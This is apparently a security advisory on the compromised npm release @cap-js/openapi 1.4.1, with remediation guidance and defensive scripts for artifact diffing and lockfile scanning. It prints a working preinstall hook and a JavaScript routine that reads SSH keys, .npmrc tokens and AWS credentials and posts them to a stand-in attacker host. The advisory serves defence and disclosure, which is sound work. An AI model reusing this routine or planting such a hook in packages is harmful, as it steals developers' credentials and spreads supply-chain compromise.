Jun 4, 2026
Malicious version 1.4.1 of @cap-js/openapi was published to npm to harvest and exfiltrate credentials, SSH keys, and tokens.
A critical supply chain compromise was identified in the Node.js package @cap-js/openapi at version 1.4.1. An attacker gained unauthorized publishing access to the npm registry and distributed a backdoored release that harvests sensitive developer credentials, environment variables, and SSH keys. The malicious code then exfiltrates the collected data to external actor-controlled servers.
The @cap-js/openapi library is a Node.js package utilized within SAP Cloud Application Programming Model (CAP) environments to handle OpenAPI integrations. On May 19, 2026, version 1.4.1 was published to the public npm registry containing malicious code. This occurrence represents a critical supply chain compromise where distribution infrastructure, rather than the public source code repository, was subverted.
Downstream applications and automated CI/CD pipelines that resolved and installed @cap-js/openapi version 1.4.1 executed the injected payload during installation or module resolution. The vulnerability presents a significant security risk because the payload operates with the execution privileges of the active Node.js process or system build user.
This analysis details the technical mechanism of the credential harvesting, the exfiltration vectors, and the precise remediation procedures required to secure affected development and deployment environments.
The root cause is classified under CWE-506: Embedded Malicious Code. The vulnerability does not stem from a logical coding error, memory unsafety, or design flaw in the development repository of @cap-js/openapi. Instead, the compromise occurred at the publishing tier of the software lifecycle, where an attacker obtained authorization credentials for the npm registry or hijacked a deployment pipeline.
The attacker modified the distributed package contents to inject malicious JavaScript routines that execute automatically during package installation or application startup. This form of dependency-jacking bypasses standard static code analysis checks that inspect only the public GitHub repository, as the malicious code was present exclusively in the npm registry artifact.
The malicious payload operates by reading environment configurations, local filesystem directories, and process spaces to extract highly privileged access materials. The lack of strict isolation between package resolution and runtime execution in standard Node.js package managers allows the payload to run with the full permissions of the invoking security context.
The malicious code was embedded directly within the distribution artifact of version 1.4.1. Such injections rely on package lifecycle hooks, such as the preinstall or postinstall scripts declared in package.json, or direct modifications to main entry point files.
Below is an analytical representation of the package descriptor file structure utilized to trigger automatic execution during the dependency resolution phase:
```json
{
  "name": "@cap-js/openapi",
  "version": "1.4.1",
  "scripts": {
    "preinstall": "node ./lib/setup.js"
  }
}
```
The targeted code-level change within the distribution's active source files, such as lib/setup.js, involved inserting a credential-harvesting routine. An abstracted representation of the data exfiltration function implemented by the threat actor is shown below:
```javascript
// Malicious routine embedded into version 1.4.1
const fs = require('fs');
const path = require('path');
const https = require('https');

function harvestSecrets() {
  const paths = [
    path.join(process.env.HOME || process.env.USERPROFILE, '.npmrc'),
    path.join(process.env.HOME || process.env.USERPROFILE, '.ssh', 'id_rsa'),
    path.join(process.env.HOME || process.env.USERPROFILE, '.aws', 'credentials')
  ];
  paths.forEach(p => {
    if (fs.existsSync(p)) {
      const content = fs.readFileSync(p, 'utf8');
      transmitData(p, content);
    }
  });
}

function transmitData(filePath, content) {
  const data = JSON.stringify({ file: filePath, payload: content });
  const req = https.request({
    hostname: 'attacker-c2-domain.com',
    port: 443,
    path: '/exfil',
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Content-Length': data.length
    }
  });
  req.write(data);
  req.end();
}

harvestSecrets();
```
To correct the compromise, the maintainers released version 1.4.2. The fix consisted of removing the unauthorized files from the npm package and regenerating publishing secrets to ensure only verified, untampered source code was distributed.
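Because the injected hook and the unauthorized files existed only in the registry artifact, comparing the published descriptor and file list with the tagged source tree is one way to surface them. The following is an added example, not code from the package or its maintainers; `diffArtifact` and both sample trees (including `lib/index.js` and the `test` script) are constructed for illustration.

```javascript
'use strict';
// Added example: diff a registry artifact against the tagged source tree.

// Scripts npm runs automatically when a dependency is installed.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

// repo / artifact: { pkg: <parsed package.json>, files: [relative paths] }
function diffArtifact(repo, artifact) {
  const repoScripts = repo.pkg.scripts || {};
  const artScripts = artifact.pkg.scripts || {};
  const repoFiles = new Set(repo.files);

  // Install-time hooks that are new or altered in the published artifact.
  const hooks = INSTALL_HOOKS
    .filter((h) => h in artScripts && artScripts[h] !== repoScripts[h])
    .map((h) => ({ hook: h, command: artScripts[h], inRepo: repoScripts[h] ?? null }));

  // Files shipped to the registry that the source tree does not contain.
  const extraFiles = artifact.files.filter((f) => !repoFiles.has(f)).sort();

  // Extra files referenced by a hook command: triage these first.
  const hookTargets = extraFiles.filter((f) => hooks.some((h) => h.command.includes(f)));

  return { hooks, extraFiles, hookTargets, suspicious: hooks.length > 0 };
}

// Constructed inputs modelled on the descriptor shown above; not the real package contents.
const repoTree = {
  pkg: { name: '@cap-js/openapi', version: '1.4.1', scripts: { test: 'jest' } },
  files: ['README.md', 'lib/index.js', 'package.json'],
};
const registryTarball = {
  pkg: { ...repoTree.pkg, scripts: { test: 'jest', preinstall: 'node ./lib/setup.js' } },
  files: ['README.md', 'lib/index.js', 'lib/setup.js', 'package.json'],
};

console.log(JSON.stringify(diffArtifact(repoTree, registryTarball), null, 2));
```

Packages that ship build output will legitimately show extra files, so the install-hook difference is the finding to triage first.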
Exploitation requires no deliberate attack actions targeting the victim application once the compromised package is listed in dependency locks. The execution flow begins when a developer or a CI/CD agent runs npm install or npm update and retrieves @cap-js/openapi version 1.4.1.
The malware targets the local environment where the execution occurs, checking for administrative secrets. Specifically, it searches for .npmrc files containing registry authentication tokens, private cryptographic keys from SSH directories, and cloud access keys within cloud provider config directories. Once collected, this sensitive data is transmitted over an encrypted outbound HTTPS channel to a command-and-control server operated by the threat actor.
The impact of this supply chain compromise is severe, resulting in complete compromise of confidentiality, integrity, and availability for the affected system. Stolen credentials, including AWS keys, NPM publish tokens, and private SSH keys, provide the threat actor with persistent administrative access to other platforms.
Using harvested GitHub Personal Access Tokens (PATs) and NPM credentials, the actor can log in to other developer repositories and propagate the malicious payload upstream. This self-propagating loop escalates the breach from a single localized server compromise to a wider enterprise-level supply chain attack.
The CVSS v3.1 base score of 9.6 reflects the critical nature of the attack vector. Because the execution is silent and occurs during standard development or testing workflows, detection times can be prolonged, increasing the window of exposure for harvested production credentials.
Remediation must be executed immediately on any host where @cap-js/openapi version 1.4.1 was installed. The first step is to upgrade the dependency to version 1.4.2 or above, which removes the backdoored code. Verify the active installation using dependency listing commands.
```bash
npm ls @cap-js/openapi
```
If version 1.4.1 is detected in the dependency graph, the host system must be treated as untrusted. All active developer sessions, execution nodes, and CI/CD containers must be recycled. All private credentials, including AWS keys, GitHub tokens, database connection strings, and NPM tokens, must be revoked and rotated immediately.
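To audit many repositories for the affected version without installing anything (an install is what runs the lifecycle hook), the lockfile can be read directly. This is an added example, not part of the advisory or the project; `findCompromised` and both sample lockfiles (`some-plugin`, `oas`, `demo-app`) are constructed, and it covers the `packages` map of lockfile versions 2 and 3 plus the nested `dependencies` tree of version 1.

```javascript
'use strict';
// Added example: locate a known-bad pinned version in package-lock.json.

const BAD = { name: '@cap-js/openapi', version: '1.4.1' }; // from the advisory

function findCompromised(lock, bad = BAD) {
  const hits = [];
  const marker = 'node_modules/';

  // lockfileVersion 2 and 3: flat "packages" map keyed by install path.
  for (const [installPath, meta] of Object.entries(lock.packages || {})) {
    const idx = installPath.lastIndexOf(marker);
    // "name" is recorded when the folder is an alias for another package.
    const name = meta.name || (idx >= 0 ? installPath.slice(idx + marker.length) : '');
    if (name === bad.name && meta.version === bad.version) hits.push(installPath);
  }

  // lockfileVersion 1: nested "dependencies" tree. Version 2 files carry both
  // sections, so the tree is walked only when "packages" is absent.
  const walk = (deps, trail) => {
    for (const [name, meta] of Object.entries(deps || {})) {
      const here = trail.concat(name);
      if (name === bad.name && meta.version === bad.version) hits.push(here.join(' > '));
      walk(meta.dependencies, here);
    }
  };
  if (!lock.packages) walk(lock.dependencies, []);
  return hits;
}

// Constructed lockfiles (not taken from a real project).
const lockV3 = { lockfileVersion: 3, packages: {
  '': { name: 'demo-app', version: '0.0.1' },
  'node_modules/@cap-js/openapi': { version: '1.4.2' },                        // fixed copy
  'node_modules/some-plugin/node_modules/@cap-js/openapi': { version: '1.4.1' }, // transitive
  'node_modules/oas': { name: '@cap-js/openapi', version: '1.4.1' },           // aliased
} };
const lockV1 = { lockfileVersion: 1, dependencies: {
  'some-plugin': { version: '2.0.0', dependencies: { '@cap-js/openapi': { version: '1.4.1' } } },
} };

console.log(findCompromised(lockV3));
console.log(findCompromised(lockV1));
```

For a real project, pass `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))`; any hit means the host that installed from that lockfile falls under the rotation steps above.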
Implement security controls to prevent future supply chain compromises. Use dependency lockfile verification, configure registry proxy tools that scan for known malicious packages, and limit the access permissions of CI/CD runners to the minimum necessary scopes.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

| Product | Affected Versions | Fixed Version |
|---|---|---|
| @cap-js/openapi @cap-js | = 1.4.1 | 1.4.2 |

| Attribute | Detail |
|---|---|
| Vulnerability Type | Supply Chain Compromise |
| CWE ID | CWE-506 |
| Attack Vector | Network (AV:N) |
| CVSS v3.1 Score | 9.6 |
| Exploit Status | Active exploitation in the wild |
| Target Component | @cap-js/openapi |
| Affected Version | 1.4.1 |
The product contains code that is intentional, hidden, and malicious.